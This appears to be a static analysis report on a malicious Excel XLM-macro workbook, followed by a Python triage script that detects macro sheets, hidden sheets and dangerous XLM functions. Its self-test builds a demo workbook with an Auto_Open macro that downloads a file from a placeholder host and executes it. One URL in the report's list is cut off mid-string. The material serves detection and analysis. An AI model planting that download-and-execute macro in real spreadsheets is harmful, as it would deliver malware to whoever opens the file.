Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 4072e8e6806dc45f…

MALICIOUS

Office (OOXML) / .XLSM

Size: 33.6 KB
Created: 2020-05-17 14:23:36 UTC
Authoring application: Microsoft Excel 16.0300
MD5: 7c35502cdc3e584a2835fdc42c504673
SHA-1: 7735e93abf9539ff343c339498af43568072b735
SHA-256: 4072e8e6806dc45f27ec62545190b558e0d8468911f518dfcaf32ace04ca9344
Risk score: 108

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

This XLSM contains an Excel 4.0 (XLM) macro sheet, a well-established malware delivery vector. The critical heuristic fired on XLM functions such as CALL, FORMULA and RUN: CALL reaches Win32 DLL exports directly, FORMULA writes new formulas into cells at run time (letting the macro assemble its real code on the fly), and RUN/EXEC start another macro or an external process. None of this passes through VBA, so VBA-only controls and VBA-stream scanners do not see it. The workbook also contains hidden sheets, a common way to keep the macro and its staging data out of view. The only URLs extracted are OOXML schema namespaces, not payload locations, and no script body was recovered, so the download destination is not known from this static result; the combination of XLM execution primitives and concealment is nevertheless consistent with a downloader or initial execution stage. Recovering the actual payload URL would require following the formula chain (or emulating the sheet), which is beyond this static analysis.

Heuristics (4)

  • Dangerous XLM formula APIs: RUN, FORMULA, CALL, HALT (severity: critical, id: OOXML_XLM_DANGEROUS_FN)
    The Excel 4.0 macro sheet uses formula APIs that reach outside the spreadsheet: =CALL and =REGISTER invoke exports of arbitrary Win32 DLLs, =EXEC and =RUN start a process or another macro, and =FORMULA writes formulas into cells at run time. These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA. HALT on its own only ends macro execution; it is listed because it terminates the chain these calls form.
  • Excel 4.0 macro sheet (1 sheet(s)) (severity: high, id: OOXML_XLM_MACROSHEET)
    The spreadsheet contains an Excel 4.0 (XLM) macro sheet, stored as a separate part under xl/macrosheets/. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft added AMSI scanning for XLM and later disabled Excel 4.0 macros by default. Even legitimate XLM use is rare in modern workbooks.
  • Hidden worksheet (state: hidden) (severity: low, id: OOXML_HIDDEN_SHEET)
    The workbook contains 8 hidden sheet(s). Hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction. The "hidden" state can be reverted from the Excel UI; the stronger "veryHidden" state can only be changed through VBA or by editing the workbook XML, so either state on a sheet in a workbook that also carries an XLM macro sheet deserves inspection.
  • Embedded URL (severity: info, id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL listed for this sample is an OOXML or Office schema namespace declared in the XML parts, i.e. boilerplate that every workbook carries, not a network indicator.
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3
    • http://schemas.microsoft.com/offi
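The four heuristics above are structural checks on the OOXML container, and they can be reproduced with nothing but the Python standard library. The script below is an added example for this page, not the analysis engine's code and not derived from the sample: it unzips a workbook from memory, lists the xl/macrosheets/ parts, reads sheet visibility and the Auto_Open/Auto_Close defined names from xl/workbook.xml, flags dangerous XLM functions inside <f> formula elements, and labels schema-namespace URLs so they are not mistaken for payload locations. The workbook it builds is constructed for the demonstration; the example.invalid URL, the C:\Users\Public path and the sheet names in it are placeholders, not indicators extracted from the sample.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main",
    "r": "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
}
# XLM functions that reach Win32, start processes or macros, or rewrite cells at run time.
DANGEROUS_XLM_FNS = {"CALL", "REGISTER", "EXEC", "RUN", "FORMULA", "FORMULA.FILL"}
# Namespace URIs every OOXML file declares; they are not network indicators.
SCHEMA_URL_PREFIXES = ("http://schemas.openxmlformats.org/", "http://schemas.microsoft.com/office/")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
FN_RE = re.compile(r"\b([A-Z][A-Z0-9.]*)\(")


def triage_xlsm(data: bytes) -> dict:
    """Static checks on an OOXML workbook given as raw bytes (an .xlsm is a zip container)."""
    z = zipfile.ZipFile(io.BytesIO(data))
    names = z.namelist()
    f = {"macrosheets": [], "hidden_sheets": [], "auto_open": [], "dangerous_fns": {}, "urls": []}

    if "xl/workbook.xml" in names:
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        # Visibility is an attribute of <sheet>; "veryHidden" cannot be undone from the Excel UI.
        for sheet in wb.iterfind(".//m:sheets/m:sheet", NS):
            state = sheet.get("state", "visible")
            if state != "visible":
                f["hidden_sheets"].append((sheet.get("name"), state))
        # XLM auto-runs through the Auto_Open/Auto_Close defined names, not through VBA.
        for dn in wb.iterfind(".//m:definedNames/m:definedName", NS):
            name = dn.get("name", "")
            if name.lower().endswith(("auto_open", "auto_close")):
                f["auto_open"].append((name, dn.text))

    for part in names:
        # Excel 4.0 macro sheets live under xl/macrosheets/, apart from ordinary xl/worksheets/.
        if part.startswith("xl/macrosheets/") and part.endswith(".xml"):
            f["macrosheets"].append(part)
            for formula in ET.fromstring(z.read(part)).iterfind(".//m:c/m:f", NS):
                for fn in FN_RE.findall((formula.text or "").upper()):
                    if fn in DANGEROUS_XLM_FNS:
                        f["dangerous_fns"].setdefault(fn, []).append(part)
        # Collect URLs from every XML part and label the channel each one came from.
        if part.endswith((".xml", ".rels")):
            for url in URL_RE.findall(z.read(part).decode("utf-8", "replace")):
                if url.startswith(SCHEMA_URL_PREFIXES):
                    label = "schema-namespace"
                elif part.startswith("xl/macrosheets/"):
                    label = "xlm-macro"
                else:
                    label = "document"
                if (url, label) not in f["urls"]:
                    f["urls"].append((url, label))
    return f


def verdict(f: dict) -> str:
    """Same ordering as the report: dangerous XLM APIs are decisive, a macro sheet alone is suspect."""
    if f["dangerous_fns"]:
        return "MALICIOUS"
    if f["macrosheets"] or f["auto_open"]:
        return "SUSPICIOUS"
    return "CLEAN"


def build_sample_xlsm() -> bytes:
    """Constructed workbook for the demonstration (not the analysed sample): one veryHidden XLM sheet."""
    workbook_xml = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
 <sheets>
  <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
  <sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>
 </sheets>
 <definedNames><definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName></definedNames>
</workbook>"""
    # The URL and path below are placeholders (assumptions), not indicators from any real sample.
    macrosheet_xml = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
 xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
 <sheetData>
  <row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://example.invalid/p.exe","C:\Users\Public\p.exe",0,0)</f><v>0</v></c></row>
  <row r="2"><c r="A2"><f>EXEC("C:\Users\Public\p.exe")</f><v>0</v></c></row>
  <row r="3"><c r="A3"><f>HALT()</f><v>0</v></c></row>
 </sheetData>
</xm:macrosheet>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/workbook.xml", workbook_xml)
        z.writestr("xl/macrosheets/sheet1.xml", macrosheet_xml)
    return buf.getvalue()


if __name__ == "__main__":
    findings = triage_xlsm(build_sample_xlsm())
    print(findings, verdict(findings))
```

Run against a real .xlsm by passing `open(path, "rb").read()` to `triage_xlsm`. Note that the function regex only looks at literal formula text: a macro that assembles its CALL string from CHAR() fragments and writes it with =FORMULA will show up here only through the FORMULA hit, which is exactly why that function is on the dangerous list.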

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_sheet_00.xml
SHA-256: ce57c66c23767785cb2d7e9b5b55ed9b5d3a9f892ebfdf1f147a7297195d5cc4
Kind: xlm-macrosheet
Source: OOXML XLM macro sheet: xl/macrosheets/sheet1.xml
Size: 77705 bytes

The carved sheet is larger than the 33.6 KB sample because OOXML parts are stored deflated inside the zip container; the size above is the decompressed XML. This part is the one to open when following the formula chain that the heuristics flagged.